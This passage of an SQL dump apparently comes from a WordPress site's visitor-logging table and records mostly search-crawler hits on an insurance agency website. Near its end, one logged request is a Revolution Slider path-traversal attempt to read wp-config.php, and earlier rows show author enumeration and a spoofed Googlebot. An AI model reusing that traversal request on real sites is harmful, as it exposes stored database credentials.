+http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(17813,'0b_3d735f7d8a53f1a71299ff69961c212b','1460758989','40.77.167.78','msnbot-40-77-167-78.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17814,'0b_5a2e990a137c285e7e28b9b7681c7688','1460759017','207.46.13.110','msnbot-207-46-13-110.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17817,'0b_4ebdb1fead3e89152f013fe9564c6f88','1460761390','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17820,'0b_4ebdb1fead3e89152f013fe9564c6f88','1460762102','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17822,'0b_4ebdb1fead3e89152f013fe9564c6f88','1460762286','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17823,'0b_6f57adb677fabe2553eb8b1b10b68064','1460762532','157.55.39.177','msnbot-157-55-39-177.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17826,'0b_27aee411749104c169f307296ade3baf','1460765536','66.249.64.24','crawl-66-249-64-24.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17829,'0b_67f6a352fcb665a11662be2b6f7435d6','1460767114','66.249.64.29','crawl-66-249-64-29.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17831,'0b_004f4ff8581441000b0b341d064a3bba','1460767481','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17834,'0b_64d00bfb120db3e3b868bb98692bf6c2','1460771174','180.76.15.27','baiduspider-180-76-15-27.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(17835,'0b_a0651f94ba7864404041874121b99ccb','1460775218','157.55.39.214','msnbot-157-55-39-214.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17838,'0b_c48f2454dbc4cf43cd19ba913833a2b1','1460777443','185.138.241.45','euspider0.wise-guys.nl','/','Python-urllib/2.7','','',0,'','','nl','','','Python-urllib','','','','0','0',0),(17840,'0b_147043fe43b519b5469b941fea3eb0dd','1460777444','185.138.241.45','euspider0.wise-guys.nl','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17841,'0b_147043fe43b519b5469b941fea3eb0dd','1460777447','185.138.241.45','euspider0.wise-guys.nl','/about-us/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17843,'0b_147043fe43b519b5469b941fea3eb0dd','1460777450','185.138.241.45','euspider0.wise-guys.nl','/about-us/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17844,'0b_147043fe43b519b5469b941fea3eb0dd','1460777451','185.138.241.45','euspider0.wise-guys.nl','/meet-the-eib-team/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17846,'0b_147043fe43b519b5469b941fea3eb0dd','1460777454','185.138.241.45','euspider0.wise-guys.nl','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17847,'0b_147043fe43b519b5469b941fea3eb0dd','1460777457','185.138.241.45','euspider0.wise-guys.nl','/igo/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17850,'0b_147043fe43b519b5469b941fea3eb0dd','1460777462','185.138.241.45','euspider0.wise-guys.nl','/forms/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17852,'0b_147043fe43b519b5469b941fea3eb0dd','1460777465','185.138.241.45','euspider0.wise-guys.nl','/contact/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17853,'0b_147043fe43b519b5469b941fea3eb0dd','1460777468','185.138.241.45','euspider0.wise-guys.nl','/carriers/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17856,'0b_147043fe43b519b5469b941fea3eb0dd','1460777471','185.138.241.45','euspider0.wise-guys.nl','/register/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17859,'0b_147043fe43b519b5469b941fea3eb0dd','1460777474','185.138.241.45','euspider0.wise-guys.nl','/insentives/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17861,'0b_147043fe43b519b5469b941fea3eb0dd','1460777477','185.138.241.45','euspider0.wise-guys.nl','/agent-tools/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17862,'0b_147043fe43b519b5469b941fea3eb0dd','1460777480','185.138.241.45','euspider0.wise-guys.nl','/case-status/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)','','',0,'WinNT','IE 5','nl','','','Unknown Spider','','','','0','0',0),(17864,'0b_f423188c6e3568941e79ce6239b6e3f1','1460781293','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(17867,'0b_f35c1b3cbd7195eb18d365e2d72a183d','1460781572','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(17870,'0b_f9d58df3bec90ae3edecb11a36998c21','1460781576','141.8.143.235','spider-141-8-143-235.yandex.com','/members/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17873,'0b_aef3fd5ee133ae0d861ace3a4e674383','1460781859','207.46.13.110','msnbot-207-46-13-110.search.msn.com','[404] /pdf/axa_accepts_your_smokers.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17874,'0b_a367a2a142bb15d96a382a76d9081b1f','1460784205','192.227.245.92','192-227-245-92-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.1985.97 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 36','us','','','','','','','0','0',0),(17877,'0b_e4d7aef586ecd69bc2aff987f2d57db1','1460786625','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(17879,'0b_e8a62e93961d0c97ce7d62f86854ba7c','1460786626','141.8.143.242','spider-141-8-143-242.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17880,'0b_e4d7aef586ecd69bc2aff987f2d57db1','1460786629','100.43.81.152','spider-100-43-81-152.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17883,'0b_5fc8db545ffbfbf8dd84335f4c53b531','1460792097','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(17886,'0b_5fc8db545ffbfbf8dd84335f4c53b531','1460792098','66.249.64.34','crawl-66-249-64-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17889,'0b_5fc8db545ffbfbf8dd84335f4c53b531','1460792107','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(17891,'0b_5fc8db545ffbfbf8dd84335f4c53b531','1460792936','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17894,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795538','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17897,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795540','136.243.152.18','static.18.152.243.136.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17898,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795542','136.243.152.18','static.18.152.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17901,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795544','136.243.152.18','static.18.152.243.136.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17904,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795547','136.243.152.18','static.18.152.243.136.clients.your-server.de','/?p=288','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17906,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795549','136.243.152.18','static.18.152.243.136.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17907,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795552','136.243.152.18','static.18.152.243.136.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17909,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795554','136.243.152.18','static.18.152.243.136.clients.your-server.de','/about-us/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17910,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795556','136.243.152.18','static.18.152.243.136.clients.your-server.de','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17913,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795558','136.243.152.18','static.18.152.243.136.clients.your-server.de','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17916,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795576','136.243.152.18','static.18.152.243.136.clients.your-server.de','/agent-tools/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17919,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795578','136.243.152.18','static.18.152.243.136.clients.your-server.de','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17921,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795580','136.243.152.18','static.18.152.243.136.clients.your-server.de','/carriers/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17924,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795582','136.243.152.18','static.18.152.243.136.clients.your-server.de','/case-status/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17925,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795584','136.243.152.18','static.18.152.243.136.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17927,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795586','136.243.152.18','static.18.152.243.136.clients.your-server.de','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17928,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795588','136.243.152.18','static.18.152.243.136.clients.your-server.de','/contact/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17931,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795590','136.243.152.18','static.18.152.243.136.clients.your-server.de','/igo/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17934,'0b_cc03c481da49cf0b21b46a27f1b9af10','1460795606','136.243.152.18','static.18.152.243.136.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(17936,'0b_7454f581f7e8ac36db4eb4119ca9d889','1460799967','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17939,'0b_b07841fd6d3e092f87011db49d814a6f','1460800771','178.63.86.11','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(17940,'0b_b07841fd6d3e092f87011db49d814a6f','1460800773','178.63.86.11','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(17943,'0b_3e5b8ff51c9b838c67567b32043c9936','1460802412','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(17945,'0b_3e5b8ff51c9b838c67567b32043c9936','1460802413','68.180.230.123','b115363.yse.yahoo.net','/under.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(17946,'0b_a1b80bf7a397716729850b1e360471b0','1460805430','69.30.215.26','69.30.215.26','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(17948,'0b_a1b80bf7a397716729850b1e360471b0','1460805442','69.30.215.26','69.30.215.26','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17949,'0b_a1b80bf7a397716729850b1e360471b0','1460805453','69.30.215.26','69.30.215.26','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17951,'0b_1bf722eacd5b044d8d6ee6d4c67e2766','1460805798','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17952,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807336','62.210.143.245','mj8.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17954,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807339','62.210.143.245','mj8.naefmarco.ch','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17957,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807342','62.210.143.245','mj8.naefmarco.ch','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17960,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807347','62.210.143.245','mj8.naefmarco.ch','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17961,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807349','62.210.143.245','mj8.naefmarco.ch','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17964,'0b_1f84841da27ee7692fbab0ee78e0ed66','1460807351','62.210.143.245','mj8.naefmarco.ch','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(17967,'0b_22b02e21ce87c57d7c481c6f7f3266ca','1460809036','86.106.17.210','210-ST-SERVER1-','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(17969,'0b_d004b1fcfb47052b757979a0755ac873','1460811443','141.8.143.214','spider-141-8-143-214.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17970,'0b_d004b1fcfb47052b757979a0755ac873','1460811564','141.8.143.242','spider-141-8-143-242.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17973,'0b_37ab37645dfa7b8eac73dd9104bd4131','1460811689','141.8.143.155','spider-141-8-143-155.yandex.com','/insentives/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17976,'0b_069482feda8c0eb6cf42fbdd3105db84','1460811814','100.43.81.137','spider-100-43-81-137.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17979,'0b_37ab37645dfa7b8eac73dd9104bd4131','1460811940','141.8.143.182','spider-141-8-143-182.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17982,'0b_3366f869c61befc009df86619bfc8b81','1460811944','100.43.85.7','spider-100-43-85-7.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17985,'0b_6bdd4236ce6e2ed894054d964388d3e8','1460817170','180.76.15.158','baiduspider-180-76-15-158.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(17987,'0b_54e2f56b1124944c3d93fdd67c2dfff9','1460817171','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(17990,'0b_05abe327a4339a31252cbfaf2fc7cb2f','1460817636','157.55.39.214','msnbot-157-55-39-214.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17991,'0b_0564298af47536773e6701aa7c9aed98','1460818830','131.72.139.212','for.perforationtags.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','ua','','','','','','','0','0',0),(17994,'0b_0564298af47536773e6701aa7c9aed98','1460818832','131.72.139.212','for.perforationtags.com','/?author=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','ua','','','','','','','0','0',0),(17997,'0b_0564298af47536773e6701aa7c9aed98','1460818833','131.72.139.212','for.perforationtags.com','/author/admin/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','ua','','','','','','','0','0',0),(17999,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818954','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18000,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818957','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18002,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818959','69.175.22.218','newscan02.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18003,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818964','69.175.22.218','newscan02.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18005,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818966','69.175.22.218','newscan02.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18008,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818968','69.175.22.218','newscan02.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18009,'0b_e8b8f3570051244d38dd17b1de30b10c','1460818970','69.175.22.218','newscan02.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(18012,'0b_bd975509965f455408d4ab1ef14bde64','1460821668','83.218.232.238','inicial.net.ua','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(18014,'0b_bd975509965f455408d4ab1ef14bde64','1460821670','83.218.232.238','inicial.net.ua','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(18015,'0b_bd975509965f455408d4ab1ef14bde64','1460821673','83.218.232.238','inicial.net.ua','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(18018,'0b_bd975509965f455408d4ab1ef14bde64','1460821676','83.218.232.238','inicial.net.ua','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ua','','','MJ12bot','','','','3','0',0),(18020,'0b_600fd97427c650b9d84fe7a82571392d','1460825074','89.248.172.78','89.248.172.78','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(18021,'0b_621e739ce5a1582861786992a7d36fc1','1460828643','94.242.190.239','239.net-94.242.190.kaluga.ru','/index.php?feed=atom','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','ru','','','Spoofer bot','','','','0','0',0),(18024,'0b_0d7d950934329582cba61d0a0edbe896','1460828645','94.242.190.239','239.net-94.242.190.kaluga.ru','/feed/atom/','Go-http-client/1.1','http://empireins.com/index.php?feed=atom','',0,'','','ru','','','Go','','','','0','0',0),(18027,'0b_457eb3c74ca63588ca7626d007973bff','1460832156','37.187.136.239','ns341701.ip-37-187-136.eu','/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','HTTP_Request2/2.3.0 (http://pear.php.net/package/http_request2) PHP/5.3.3','','',0,'','','eu','','','HTTP_Request2','','','','3','0',0),(18029,'0b_1e7dd87b22915aadfc1bb788594cb321','1460832332','180.76.15.149','baiduspider-180-76-15-149.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; 